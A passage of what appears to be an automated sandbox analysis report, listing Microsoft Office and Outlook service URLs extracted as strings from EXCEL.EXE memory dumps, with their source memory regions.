      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/OneNoteBulletinshttps://
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://augloop.office.com
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2Bearer
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.
      Source: EXCEL.EXE, 00000000.00000002.935840425.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742471357.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.773711564.000000000F729000.00000004.00000001.sdmpString found in binary or memory: https://autodiscover-s.outlo
      Source: EXCEL.EXE, 00000000.00000003.742802680.000000000E1B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661707076.000000000E1B3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656483060.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934569051.000000000E1C3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660226396.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778360459.000000000E1B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852707651.000000000E1C3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652977431.000000000E137000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654190436.000000000E19D000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: EXCEL.EXE, 00000000.00000003.652989909.000000000F73B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935840425.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742471357.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.773711564.000000000F729000.00000004.00000001.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml=3
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://cdn.entity.
      Source: EXCEL.EXE, 00000000.00000002.934621206.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654254896.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661747538.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660265666.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652940500.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655880436.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652838684.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.851830559.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778410177.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742911449.000000000E20D000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsellSkyDriveSignUpUpsellImageht
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell/c
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellLiveProfileServicehttps
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/abc
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://clients.config.office.net/
      Source: EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/Bearer
      Source: EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/l
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policiesBearer
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policieshttps://login.windows.net/common/oauth2/
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policiestf&
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosBearer
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosI
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ioshttps://login.windows.net/common/oauth2/authorize
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/macBearer
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/machttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/maco
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyBearer
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyhttps://login.windows.net/common/oau
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/y
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/em
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://config.edge.skype.com
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.comV
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://cortana.ai
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://cortana.ai/api
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apiBearer
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apigs
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietl
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://cr.office.com
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comHa
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comm
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.coms
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comvd
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
      Source: EXCEL.EXE, 00000000.00000003.742853289.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660247505.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654236313.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652925426.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934591120.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778384283.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661726514.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852724407.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652824432.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655830251.000000000E1DC000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesBearer
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://dev.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.aiBearer
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.aihttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://devnull.onenote.com
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.com0
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comBearer
